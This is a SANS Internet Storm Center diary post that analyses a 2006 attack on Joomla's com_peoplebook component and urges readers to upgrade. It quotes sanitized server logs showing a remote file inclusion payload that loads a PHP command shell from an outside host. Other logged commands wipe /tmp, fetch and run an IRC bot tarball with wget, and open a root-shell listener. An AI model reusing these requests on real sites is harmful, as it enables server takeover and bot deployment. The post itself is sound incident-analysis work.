Threat Level: green Handler on Duty: Jan Kopriva

SANS ISC: Attacks against Joomla com_peoplebook - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Attacks against Joomla com_peoplebook
As reported in a couple of previous diaries (http://isc.sans.org/diary.php?storyid=1483 & 1480 ), less than adequate input validation resulted in a fair few attacks against Joomla and Mambo components. Joomla is a powerful open-source Content Management System written in php. Yesterday we received word of another attack, this time against com_peoplebook.

Here are a few of the httpd log entries that we were provided, suitably sanitized at the hosting provider's request. Note the timelag between log entries - there was a living human at the other end of the wire manually manipulating this server.

  xxx.xx.108.22 - - [27/Jul/2006:20:52:47 -0400] "GET /administrator/components/com_peoplebook/
  param.peoplebook.php?mosConfig_absolute_path=http://coderepository.xx/.mn/cmd.txt?&cmd=id
 HTTP/1.1" 200 2103
The remote file cmd.txt that is included as new "configuration" info contains the necessary php to use either the "system", "passthru" or "exec" functions to execute arbitrary code on the target machine, and provide lots of other nifty capabilities such as local exploits, an email spoofer, a fixed-range portscanner, etc. Here, the attacker merely checks the user ID that the webserver is running as. The HTTP result of 200 indicates success.
  xxx.xx.108.22 - - [27/Jul/2006:20:53:09 -0400] "GET /administrator/components/com_peoplebook/
  param.peoplebook.php?mosConfig_absolute_path=http://coderepository.xx/.mn/cmd.txt?&cmd=
  cd%20..;cd%20..;echo%20RickyFloW%20was%20here%20from%20HackBSD%20CreW%20@%20undernet%20>bsd.htm;ls
  HTTP/1.1 200 2158

Our attacker, let's call him Ricky, leaves his calling card in the form of a new htm file. First, he tries to get to a location that is writable by the webserver and likely fails, as he tries again after going up one more level:

  xxx.xx.108.22 - - [27/Jul/2006:20:53:24 -0400] "GET /administrator/components/com_peoplebook/
  param.peoplebook.php?mosConfig_absolute_path=http://coderepository.xx/.mn/cmd.txt?&cmd=
  cd%20..;echo%20RickyFloW%20was%20here%20from%20HackBSD%20CreW%20@%20undernet%20>bsd.htm;ls
 HTTP/1.1 200 2524
OK, now that the most important stuff is out of the way, Ricky builds his bot:
  xxx.xx108.22 - - [27/Jul/2006:20:54:03 -0400] "GET /administrator/components/com_peoplebook/
  param.peoplebook.php?mosConfig_absolute_path=http://coderepository.xx/.mn/cmd.txt?&cmd=
  cd%20/tmp;rm%20-rf%20*;wget%20toscanacasting.it/.mn/mech.tar;tar%20-xvf%20mech.tar;cd%20httpd;
  ./start.sh;cd%20/tmp;rm%20-rf%20mech.tar;mv%20httpd%20.httpd HTTP/1.1 200 2248
He pulls down his tarball, mech.tar, which contains an old reliable IRC bot, EnergyMech version 2.8, compiled back in 2001. Along with it was a config file & a number of scripts to do nasti things upon command in the IRC channel that it joins. A simple packet flooder, Perl-based shell shoveler, log wiper,etc. Note the name he gives his bot, httpd. Would you noticed an extra httpd entry in your ps list? Apache, by default, forks off 10 of them at startup and more as needed. This simple technique can be very effective against casual sysadmin review.
  xxx.xx.108.22 - - [27/Jul/2006:20:56:08 -0400] "GET /administrator/components/com_peoplebook/
param.peoplebook.php?mosConfig_absolute_path=http://coderepository.xx/.mn/cmd.txt?&cmd=
  cd%20/tmp/.httpd;%20./z HTTP/1.1 200 2091
Ricky, now wanting to really give himself away, starts up a persistent listener that gives anyone a root shell if they connect to a fixed port. There is no attempt at hiding this from netstat, although plenty of userspace and kernel rootkits can do this with their hands tied behind their backs. Bad Ricky. Bad,lazy H4X0r Ricky.

I joke about his lack of sophistication, but he wouldn't keep up this practice if it wasn't successful. There are plenty of vulnerable systems that aren't reviewed carefully by their admins. If you are running Joomla, heed their dev website (http://dev.joomla.org/content/blogcategory/21/86/) posting:

All existing Joomla! users MUST UPGRADE to this version, due to several High Level vulnerabilities
 that affect ALL Previous versions of Joomla!
1.0.10 contains the following important security fixes:

    * 03 High Level Security Fixes
    * 01 Medium Level Security Fixes
    * 05 Low Level security
    * 40+ General bugfixes

If you are using ANY previous version of Joomla!, you need to upgrade to 1.0.10

In addition, be sure to update any third-party components, like com_peoplebook (http://forge.joomla.org/sf/projects/peoplebook), to take advantage of the
security enhancements enabled by the new release of Joomla.

Cheers!

Handlers

76 Posts

Sign Up for Free or Log In to start participating in the conversation!